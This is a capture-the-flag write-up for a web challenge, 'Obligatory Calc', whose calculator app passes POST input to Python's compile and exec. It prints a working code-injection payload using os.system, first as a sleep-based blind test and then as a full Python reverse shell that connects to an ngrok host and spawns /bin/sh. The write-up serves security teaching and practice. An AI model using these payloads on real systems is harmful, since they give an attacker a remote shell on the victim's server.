Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Description
  • Exploiting the vulnerability

Was this helpful?

  1. Authored
  2. NYP InfoSec December CTF 2022

Obligatory Calc

PreviousAww Cuter CatNextBreadSecurity

Last updated 2 years ago

Was this helpful?

Difficulty
Points
Solves

Easy

147

10

Description

In every CTF that I've seen There's always a calculator routine It tests our skills and our wit To solve it, we must not quit Poem by ChatGPT

The web application receives user input from a POST request, then uses the compile function to generate a code object from the string that represent the arithmetic operation.

The code object is then executed using the exec function, and the result is stored in a dictionary called msg.

The web application is using the compile and exec functions to dynamically generate and execute code based on user input, which could be exploited by an attacker to inject malicious code and execute it.

Exploiting the vulnerability

Using burpsuite, I intercepted the request and send it to repeater using Ctrl + R

Next, I modify the int1=1&operator=%2B&int2=1 to a payload to perform blind code execution

int1=1&operator=*__import__('os').system('python -c "import time;time.sleep(5)"')#&int2=1

The web application will sleep for 5 second before returning 0 suggesting that the blind code execution works

Modify the payload to a standard python reverse shell

int1=1&operator=*__import__('os').system('''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",18531));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''')#&int2=1

We have successfully shelled the server and gotten the flag.